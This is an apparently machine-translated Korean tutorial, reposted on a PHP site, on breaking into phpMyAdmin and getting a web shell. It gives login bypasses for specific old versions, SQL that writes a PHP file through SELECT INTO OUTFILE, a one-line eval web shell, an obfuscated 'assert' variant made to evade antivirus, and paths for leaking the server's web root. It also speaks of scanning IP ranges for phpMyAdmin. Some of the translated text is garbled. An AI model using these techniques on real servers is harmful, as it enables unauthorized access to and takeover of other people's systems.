>  기사  >  데이터 베이스  >  PHPmyadmin 취약점 분석 및 쉘 소개

PHPmyadmin 취약점 분석 및 쉘 소개

藏色散人
藏色散人앞으로
2021-02-10 15:13:213868검색

phpmyadmin의 다음 튜토리얼 칼럼에서는 PHPmyadmin 취약점과 셸 얻기에 대해 소개할 예정입니다. 이 칼럼이 필요한 친구들에게 도움이 되기를 바랍니다!

PHPmyadmin 취약점 분석 및 쉘 소개

phpmyadmin에는 상대적으로 많은 허점이 있습니다. 코드 감사에 대해 깊이 있는 분들도 저에게 몇 가지 허점을 공유하고 싶습니다
phpmyadmin2.11.3-2.11 .4 이 두 버전에는 범용 비밀번호가 있습니다. 'localhost'@'@"를 계정번호로 직접 사용하면 비밀번호를 입력할 필요가 없습니다.

phpmyadmin2.11.9.2 빈 비밀번호가 있습니다. 이 버전에서는 루트 사용자로 직접 로그인하세요. 비밀번호가 필요하지 않습니다.

이 내용을 찾으려면 자신의 스크립트나 검색 엔진 등을 사용하세요. t, 여기서 신경쓰지 마세요.

셸 얻기에 대해 ---->루트 권한 및 쓰기 권한 있음---"내보낸 디렉터리에 쓰기 권한이 있습니다---" 경우에 따라 둘 다 가지고 있지만 서버의 일부 구성은 여전히 ​​여기에 영향을 미칩니다.

getshell 전에 먼저 데이터베이스를 입력하세요

먼저, SQL 문을 사용하고, 테이블을 만들고, 필드를 추가하고, 필드가 한 문장이면 이를 PHP 파일로 내보낸 다음 마지막으로 테이블을 삭제합니다. 이것이 가장 안전한 방법입니다
Create TABLE table (column text NOT NULL)
Insert INTO table (column) VALUES('f0a5bc860caf7e9b478c25a8f3caefec')
테이블에서 열을 _utfile '경로'로 선택
TABLE IF EXISTS 테이블 삭제
두 번째 방법 , 직접 쓰는 방법
'문장' INTO _UTFILE '경로 선택
여러 가지 방법이 있지만 일반적인 원칙은 동일합니다
그러면 일반적으로 한 문장으로 단어가 모두

<span style="font-size: 16px;"><?php @eval($_POST[x])?><br/></span>

개를 키우는 경우 "살인을 피하십시오"라는 문장을 사용하십시오. 개를 넘기기 위해 설날 전에 만들었던 문장

<span style="font-size: 16px;"><?php<br/> $a = &#39;s&#39;;<br/> $str = str_repeat($a,2);<br/> $to = $_POST;<br/> //echo $str;<br/> $exp = &#39;a&#39;.$str[0].$str[1].&#39;e&#39;.&#39;r&#39;.&#39;t&#39;;<br/> $exp($to[&#39;x&#39;])<br/> ?><br/></span>

길을 찾고 계시다면

<span style="font-size: 16px;">1// 利用phpinfo.php<br/> 2//利用phpmyadmin的一些文件报错,下面都是网上通用的<br/> /phpMyAdmin/index.php?lang[]=1<br/> /phpMyAdmin/phpinfo.php<br/> /load_file()<br/> /phpmyadmin/themes/darkblue_orange/layout.inc.php<br/> /phpmyadmin/libraries/select_lang.lib.php<br/> /phpmyadmin/libraries/lect_lang.lib.php<br/> /phpmyadmin/libraries/mcrypt.lib.php<br/> /phpmyadmin/libraries/export/xls.php<br/></span>

3//더 나아가서, 웹사이트 패키지 경로를 알고 있으면 알 수 있을 것입니다.

스크립트는 IP를 스캔하여 phpmyadmin이 있음을 보여줍니다. ㅋㅋㅋ
. . .
이 작업은 확실히 완료되었습니다. 권리를 에스컬레이션할 필요가 없습니다.

위 내용은 PHPmyadmin 취약점 분석 및 쉘 소개의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

성명:
이 기사는 csdn.net에서 복제됩니다. 침해가 있는 경우 admin@php.cn으로 문의하시기 바랍니다. 삭제